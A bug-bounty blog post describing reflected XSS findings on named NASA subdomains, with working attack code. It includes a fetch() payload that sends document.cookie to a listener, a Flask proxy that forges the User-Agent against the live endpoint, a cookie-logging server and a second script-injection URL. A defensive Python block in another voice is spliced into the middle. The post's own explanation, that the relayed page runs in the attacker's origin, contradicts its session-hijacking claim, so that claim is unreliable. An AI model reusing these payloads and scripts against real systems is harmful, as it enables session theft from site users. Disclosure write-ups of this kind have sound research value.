In the cybersecurity community, getting a “Hall of Fame” recognition from an organization like NASA is a significant milestone. It’s not just about finding a bug; it’s about demonstrating real-world impact. I want to share the story of my findings, particularly one that started as “Informational” and became my ticket to the Hall of Fame.

Report 1: The Hall of Fame Vulnerability

This was the key finding. It was a Reflected Cross-Site Scripting (XSS) vulnerability that required a chained exploit to prove its true potential.

Discovery & Initial Triage

  • Target: https://nodis3.gsfc.nasa.gov
  • Endpoint: /cancelled_docs.cfm?search=*

I identified that the User-Agent HTTP header was being reflected directly into the HTML response without output encoding. My initial report, which used a simple alert() payload, was marked as “Informational.” This is common for User-Agent-based XSS: a victim cannot be made to send an arbitrary User-Agent just by clicking a link, so it is often treated as “self-XSS.”

I knew the impact was much higher. To prove it, I had to show how an attacker could force a victim’s browser to send the malicious User-Agent and, more importantly, what they could steal.
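To make the bug class concrete, the following is an added example (my illustration, not the author's code and not the NASA application's .cfm page): a constructed stand-in for a page that reflects the User-Agent into a double-quoted attribute value. The hypothetical render_vulnerable function concatenates the header in raw; render_fixed applies HTML entity encoding with quotes escaped, which is the fix an attribute context needs. injected_handlers parses the resulting markup with Python's HTMLParser, roughly as a browser would, and reports any on* event-handler attribute, so it tells a harmless reflection apart from one where the payload broke out of the attribute; reflected_unencoded is the canary probe that initial triage sends. The cookie-stealing payload is the one from this post; the template, the probe string and the function names are assumptions. The same checks apply to any reflected value, for example a URL query parameter.

```python
import html
from html.parser import HTMLParser

# Constructed stand-in for the reflecting page (not the real .cfm template):
# the User-Agent lands inside a double-quoted attribute value.
PREFIX = '<input type="hidden" name="ua" value="'
SUFFIX = '">'

# Cookie-stealing payload from the post: close the attribute and the tag,
# then open an <svg> whose onload handler exfiltrates document.cookie.
PAYLOAD = "\"><svg onload=fetch('http://localhost:5001/listen?c='+document.cookie)//\""

# Triage probe (assumed): one character from each class that matters in an
# attribute context, so any encoding of them is visible in the response.
PROBE = 'uaprobe"><x'


def render_vulnerable(user_agent: str) -> str:
    """Reflect the header with no output encoding (the bug class in the report)."""
    return PREFIX + user_agent + SUFFIX


def render_fixed(user_agent: str) -> str:
    """Reflect the header HTML-entity encoded. quote=True also encodes " and ',
    which an attribute context needs; escaping < and > alone is not enough."""
    return PREFIX + html.escape(user_agent, quote=True) + SUFFIX


class _TagCollector(HTMLParser):
    """Collect every start tag and its attributes as the parser sees them."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def injected_handlers(markup: str):
    """Return (tag, attribute) pairs for every on* event handler in the markup.
    Non-empty means the reflected value escaped its attribute and became markup."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return [(tag, name) for tag, attrs in parser.tags
            for name in attrs if name.startswith("on")]


def reflected_unencoded(markup: str, probe: str) -> bool:
    """Initial triage check: does the probe come back byte-for-byte?"""
    return probe in markup


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        print(f"[{label}] probe reflected raw: {reflected_unencoded(render(PROBE), PROBE)}")
        print(f"[{label}] event handlers injected: {injected_handlers(render(PAYLOAD))}")
```

Running the block prints that the vulnerable renderer reflects the probe raw and yields an injected svg/onload handler, while the fixed renderer does neither. The probe is what to send first; the handler check is what separates "the text came back" from "the text became a tag".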

Upgrading the Impact: The Exploit Chain

My goal was to upgrade this from a simple reflection to a one-click, silent cookie-stealing exploit. To do this, I built a two-part system:

  1. A Flask Proxy Server: To act as the attacker’s malicious website.
  2. A Flask Cookie Listener: To receive the stolen data.

Technical Deep Dive: The Payload

First, I crafted a payload designed to be injected into the User-Agent header. Instead of a noisy alert(), I used fetch() to silently send the victim’s cookies to my listener.

  • Payload (HTML):
    "><svg onload=fetch('http://localhost:5001/listen?c='+document.cookie)//"

The Exploit Code (PoC)

1. Attacker’s Proxy Server (app.py)

This script does not redirect the victim to NASA; it fetches the NASA page server-side with the payload in the User-Agent header and relays the response body to whoever visits http://127.0.0.1:5000/proxy, so the victim never has to set the header themselves. Because the relayed HTML is served from the attacker's own origin (127.0.0.1:5000), the injected script runs in that origin, and document.cookie returns only the non-HttpOnly cookies the browser holds for it.

import requests
from flask import Flask, request, Response

app = Flask(__name__)

@app.route("/proxy")
def proxy():
    target_url = "https://nodis3.gsfc.nasa.gov/cancelled_docs.cfm?search=*"
    
    # The malicious payload
    payload = "\"><svg onload=fetch('http://localhost:5001/listen?c='+document.cookie)//\""
    
    # Forging the headers
    headers = { "User-Agent": payload }
    
    try:
        # Forwarding the request to NASA with the malicious header
        resp = requests.get(target_url, headers=headers)
        return Response(resp.content, content_type=resp.headers.get('Content-Type'))
    except Exception as e:
        return f"Error: {e}", 500

if __name__ == "__main__":
    app.run(port=5000)

2. Attacker’s Cookie Listener (cookie.py)

This simple server just waits to receive the data from the fetch() request and prints it to the console.

from flask import Flask, request

app = Flask(__name__)

@app.route('/listen')
def listener():
    # Grabs the cookie from the URL parameter
    cookie = request.args.get('c')
    
    # Attacker's successful result
    print("[+] Cookie received:", cookie)
    
    return "Cookie captured!", 200

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5001)

The Result

After I started both scripts and visited the proxy URL, my listener’s terminal immediately showed the result:

[+] Cookie received: token=mandipxss1_REDACTED_123

I had successfully demonstrated a full attack chain. This proved the vulnerability was not informational, but a critical risk that could lead to complete session hijacking. I resubmitted my findings with the full proof of concept, code, and video.

Report 2: The Hunt Continues (A Duplicate Finding)

Even after the Hall of Fame submission, I continued hunting. I found a second vulnerability on a different subdomain.

  • Target: https://vmsfc.russia.nasa.gov
  • Vulnerability: P3 Reflected XSS
  • Endpoint: /ssl-vpn/getconfig.esp
  • Parameter: user

This was a more conventional Reflected XSS: the user query-string parameter was reflected into the response without sanitization or output encoding.

  • Vulnerable URL: https://vmsfc.russia.nasa.gov/ssl-vpn/getconfig.esp?...&user=<svg xmlns="http://www.w3.org/2000/svg"><script>prompt("XSS")</script></svg>&domain=(empty_domain)&computer=computer

This vulnerability was already known and had been reported by another researcher, so my report was closed as a Duplicate. This is a normal and expected part of the bug bounty process.

Conclusion: Persistence and Recognition

The most interesting part of this journey was the recognition. For that first, high-impact report, I didn’t receive an immediate acknowledgment or reply from the team.

However, my work had been seen. For demonstrating a critical, chained exploit and helping NASA secure its assets, my name was added to the NASA Hall of Fame.

This experience proves two things:

  1. Always show the full impact. Don’t stop at “Informational.” If you believe a bug is more severe, build the exploit and prove it.
  2. Persistence pays off. Even if you don’t get an immediate reply, or if you find duplicates, your work matters. The right report will eventually get the recognition it deserves.

Thank you for reading.

Best regards,
Mandip Guragai
